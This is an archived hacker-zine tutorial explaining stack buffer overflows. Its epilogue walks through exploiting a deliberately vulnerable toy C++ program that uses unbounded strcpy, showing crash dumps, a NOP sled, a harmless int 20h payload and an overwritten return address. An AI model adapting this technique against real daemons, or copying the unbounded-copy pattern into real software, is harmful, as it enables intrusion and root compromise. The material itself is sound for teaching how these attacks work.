TUCoPS :: General Information :: bufovf.txt

Principles of Buffer Overflow explained

.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
                Principles of Buffer Overflow explained by Jus
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.

This article is an attempt to quickly and simply explain everyone's favourite
manner of exploiting daemons - The Buffer Overflow.

- Huh? -

The remote buffer overflow is a very commonly found and exploited bug in badly
coded daemons - by overflowing the stack one can cause the software to execute
a shell equal to its current UID - thus if the daemon is run as root, like
many are, a root shell will be spawned, giving full remote access.

A buffer is a block of computer memory that holds many instances of the same
data type - an array. Arrays can be static and dynamic, static being allocated
at load time and dynamic being allocated dynamically at run time. We will be
looking at dynamic buffers, or stack-based buffers, and overflowing, filling
up over the top, or breaking their boundaries.

A stack has the property of a queue of objects being placed one on top of the
other, and the last object placed on the stack will be the first one to be
removed. This is called LIFO - or last in first out. An element can be added 
to the stack (PUSH) and removed (POP). A stack is made up of stack frames, 
which are pushed when calling a function in code and popped when returning it.

The stack pointer (SP) always points to the top of the stack, the bottom of it
is static. PUSH and POP operations manipulate the size of the stack
dynamically at run time, and its growth will either be down the memory
addresses, or up them.  This means that one could address variables in the
stack by giving their offsets from SP, but as POP's and PUSH's occur these
offsets change around. Another type of pointer points to a fixed location
within a frame (FP). This can be used for referencing variables because their
distances from the FP will not change.

- The Overflow -

A buffer overflow is what happens when more data is forced into the stack than
it can handle. We use this to change the flow of execution of a program -
hopefully by executing code of our choice, normally just to spawn a shell.

We can change the return address of a function by overwriting the entire
contents of the buffer, by overfilling it and pushing data out - this then
means that we can change the flow of the program. By filling the buffer up
with shellcode, designed to spawn a shell on the remote machine, and
overwriting the return address so that it points back into the buffer, we can
make the program run the shellcode.

This is just a simplified version of what actually happens during a buffer
overflow - there is more to it, but the basics are essential to understand if
you want to win an argument one day.

-jus (jus@security.za.net)

[ Epilogue by Wyzewun:

Time for a practical example. I did this some time ago on my Dad's Windoze box
to explain it to myself: I had downloaded a file on Win32 buffer overflows but
I really didn't feel like reading, so I figured it out myself instead. It took
me +-20 mins to do the whole thing, but at least I was keeping a log of me
trying to get it right so I can just paste it more or less unchanged here -
save, of course, for the explanations. Next time I'll get human and actually
READ UP on whatever I'm trying to do before I try DO it so I don't waste so
much damn time. :/ Anyway, here's the notes...

#include <iostream.h>
#include <string.h>

int main() {

  char buffer[40];
  char buffer2[20]; // This doesn't need to be smaller though

  cout << "Gimmee a variable\n";
  cin >> buffer;
  strcpy(buffer2, buffer);
  return 666; }

Because strcpy() has no bounds checking, there is an obvious buffer overflow
vulnerability here...

c:\>overflow
Gimmee a variable
12345678901234567890

It executed fine. Now lets try...

c:\>overflow
Gimmee a variable
123456789012345678901

At this point Windoze cuts in with the following...

OVERFLOW caused an invalid page fault in module OVERFLOW.EXE at 015f:00402127.

Registers:
EAX=0000029a CS=015f EIP=00402127 EFLGS=00000206
EBX=00530000 SS=0167 ESP=0063fe0c EBP=00630031
ECX=0063fdd4 DS=0167 ESI=81596754 FS=1157
EDX=00400031 ES=0167 EDI=00000000 GS=0000

Bytes at CS:EIP:
89 45 e4 50 e8 12 15 00 00 8b 45 ec 8b 08 8b 09 

Stack dump:
00000000 81596754 00530000 c0000005 0063ff68 0063fe0c 0063fc3c 0063ff68
00403d18 00407190 00000000 0063ff78 bff8b537 00000000 81596754 00530000 

Is this a buffer overflow bug or is this something else we are mistaking for
one? Well, let's check, we feed it a good 30 "a" characters and we look at the
values of the registers when it dies....

Registers:
EAX=0000029a CS=015f EIP=61616161 EFLGS=00000202
EBX=00530000 SS=0167 ESP=0063fe00 EBP=61616161
ECX=0063fddc DS=0167 ESI=81596628 FS=117f
EDX=00006161 ES=0167 EDI=00000000 GS=0000

Aaah, see that? EIP is 61616161 - 61 being the hex value of the "a" character,
so it's overflowing allright. Now let's exploit it. :) First off, we add the
following line into the example C++ proggy above...

cout << &buffer2 << "\n";

And when executing the program, the output we get is as follows...

0x0063FDE4
Gimmee a variable

Right, so buffer2's address is 0x0063FDE4 - and just in case that's a bit off
for some reason - we'll pad it a bit.

Padding? Right. Executing the NOP function (0x90) which most CPU's have - just
something to do nothing. That way, hopefully, when we overwrite the return
address we can land somewhere in the middle of the NOPs, and then just execute
along until we get to our shellcode. Errr, I'm not being clear, what I mean is
the buffer will look like: [NOPNOPNOPNOP] [SHELLCODE] [NOPNOPNOPNOP] [RET]

Shellcode? Right. We can execute pretty much anything we want, and as much as
I would like to have interesting shellcode, I don't have the tools to make
some on this PC, and I *really* don't feel like going online to rip somebody
else's. And so, my choice in shellcode - int 20h - program termination. :)

Right!!! So our shellcode is 2 characters, and we can feed the program 24
characters before we start overwriting the return address, so lets have 11 NOP
characters on either side of our shellcode just to make it pretty and even
looking. Let's try this out...

c:\>overflow
Gimmee a variable
Í cıä

c:\>

Heeey, I gave it too many characters and it didn't crash. It worked. :) That
string in hex would be 9090909090909090909090CD20909090909090909090909063FDE4,
the CD20 in the middle being interrupt 20h, and the 63FDE4 being the address
of the buffer we're overflowing, which we are setting as the return address,
namely 0x0063FDE4. Hopefully you're beginning to see the idea here. If you
would like to play around with my example file some more, I included the
binary in the general-junk directory of this issue. Have fun! ]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH